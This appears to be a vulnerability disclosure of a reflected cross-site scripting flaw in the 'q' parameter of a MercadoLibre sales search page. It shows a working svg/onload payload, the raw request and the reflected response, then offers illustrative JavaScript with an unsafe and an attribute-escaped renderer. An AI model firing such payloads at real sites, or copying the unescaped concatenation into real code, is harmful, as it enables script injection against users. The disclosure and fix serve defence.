The vulnerable parameter is "q", and exploitation is through a GET request. The attack works with the parameter "type" set to either of:
* type=recent
* type=archived
Example:
https://myaccount.mercadolibre.com.ar/sales/list#type=recent&q="><svg/onload=alert(8)>
Request:
GET /sales/cartSearch?type=recent&q="><svg/onload=alert(8)> HTTP/1.1
Host: myaccount.mercadolibre.com.ar
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://myaccount.mercadolibre.com.ar/sales/list
X-NewRelic-ID: XQ4OVF5VGwIIUFZQAQUB
X-Requested-With: XMLHttpRequest
Response:
<form data-component="actions-search" class="form-search" onsubmit="return false;">
<div id="iePlaceHolder" class="ie-place-holder">Comprador o venta</div>
<input type="text" id="search" name="search" class="txt-search" placeholder="Comprador o venta" value="">
<svg/onload=alert(8)>
<input type="button" id="searchBtn" value="Buscar" class="ch-btn-skin ch-btn-small">
</form>
We can see that the server does not filter special characters correctly, which allows a malicious user to inject arbitrary code. The leading `">` in the value of "q" closes the "value" attribute and the input tag, so the "svg" tag entered is embedded as markup in the server's response, allowing exploitation of this vulnerability.
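The fix for the reflection shown above is to encode "q" for the HTML attribute context before writing it into `value`. The following is an added example, not MercadoLibre's code: the function names (`escapeAttr`, `renderSearchUnsafe`, `renderSearchSafe`, `handleCartSearch`, `countTags`) are hypothetical, and it assumes the server builds the input tag by string concatenation.

```javascript
// Added example: hypothetical server-side rendering of the search input.
// Characters that can terminate a quoted attribute value or open a tag.
const ATTR_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '`': '&#x60;',
};

// Encode a value for use inside a quoted HTML attribute.
function escapeAttr(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => ATTR_ESCAPES[ch]);
}

const INPUT_OPEN = '<input type="text" id="search" name="search" class="txt-search" value="';

// Assumed vulnerable behaviour: q is concatenated into value="..." as-is.
function renderSearchUnsafe(q) {
  return INPUT_OPEN + q + '">';
}

// Hardened form: same markup, q encoded for the attribute context.
function renderSearchSafe(q) {
  return INPUT_OPEN + escapeAttr(q) + '">';
}

// Parse the query string, allow only the two "type" values named on the page,
// and render the input with the supplied renderer.
function handleCartSearch(queryString, render) {
  const params = new URLSearchParams(queryString);
  const type = params.get('type');
  if (type !== 'recent' && type !== 'archived') {
    throw new Error('unsupported type');
  }
  return render(params.get('q') || '');
}

// Count tags opened in a fragment; the template alone opens exactly one (<input>).
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Query string taken from the request shown on this page.
const QUERY = 'type=recent&q="><svg/onload=alert(8)>';

console.log(handleCartSearch(QUERY, renderSearchUnsafe)); // svg lands as a second tag
console.log(handleCartSearch(QUERY, renderSearchSafe));   // payload stays inside value=""
```

A tag count above one for the unsafe renderer is the same condition the response on this page shows; the same count works as a regression check in a template test suite.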